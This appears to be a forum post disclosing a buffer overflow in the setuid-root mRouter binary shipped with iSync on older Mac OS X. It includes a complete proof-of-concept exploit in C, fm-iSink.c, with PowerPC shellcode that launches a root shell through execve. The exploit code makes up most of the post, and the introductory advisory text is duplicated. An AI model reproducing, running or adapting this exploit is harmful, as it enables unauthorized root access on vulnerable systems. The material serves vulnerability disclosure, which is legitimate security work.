The mRouter binary's buffer overflow is triggered by using the -v and
-a switches, and sending a buffer of 4096 bytes. Although I was unable
to successfully exploit it because of the call to seteuid(501) early in
the binary, nemo had no problem. He released a proof-of-concept that
resolves this problem and results in euid=0.
Apple has been notified of this bug.
nemo's Exploit:
<------------ fm-iSink.c ----------->
/*
* fm-iSink.c
* overflow in mRouter, suid binary used by iSync, on OSX <= 10.3.7
*
* written by -( nemo @ felinemenace.org )-
*
* _,'| _.-''``-...___..--';)
* /_ \'. __..-' , ,--...--'''
* <\ .`--''' ` /'
* `-';' ; ; ;
* __...--'' ___...--_..' .;.'
* fL (,__....----''' (,..--''
*
* http://pulltheplug.org and http://felinemenace.org.
*
* Bug discovered by Braden Thomas. Exploit by nemo.
*
* -( need a challenge...? )-
* -( http://www.pulltheplug.org )-
*/
mRouter suid root binary installed by iSync in OS X 10.3 by default.
Program: /System/Library/SyncServices/SymbianConduit.bundle/Contents/
Resources/mRouter
Impact: Privilege Escalation (root access euid=0)
Discovered: 12th January, 2005
The mRouter binary's buffer overflow is triggered by using the -v and
-a switches, and sending a buffer of 4096 bytes. Although I was unable
to successfully exploit it because of the call to seteuid(501) early in
the binary, nemo had no problem. He released a proof-of-concept that
resolves this problem and results in euid=0.
Apple has been notified of this bug.
nemo's Exploit:
<------------ fm-iSink.c ----------->
/*
* fm-iSink.c
* overflow in mRouter, suid binary used by iSync, on OSX <= 10.3.7
*
* written by -( nemo @ felinemenace.org )-
*
* _,'| _.-''``-...___..--';)
* /_ \'. __..-' , ,--...--'''
* <\ .`--''' ` /'
* `-';' ; ; ;
* __...--'' ___...--_..' .;.'
* fL (,__....----''' (,..--''
*
* http://pulltheplug.org and http://felinemenace.org.
*
* Bug discovered by Braden Thomas. Exploit by nemo.
*
* -( need a challenge...? )-
* -( http://www.pulltheplug.org )-
*/
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#define VULNPROG
"/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/
mRouter"
#define MAXBUFSIZE 4096
char shellcode[] = // Shellcode by b-r00t, modified by nemo.
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68";
char filler[MAXBUFSIZE];
int main(int ac, char **av)
{
unsigned int ret = 0xbffffffa - strlen(shellcode);
char *args[] = { VULNPROG, "-v", "-a", filler, NULL };
char *env[] = { "TERM=xterm", shellcode, NULL };
memset(filler,(char)'A',sizeof(filler));
memcpy(filler+MAXBUFSIZE-5,&ret,4);
execve(*args, args,env);
return 0;
}
[ reply ]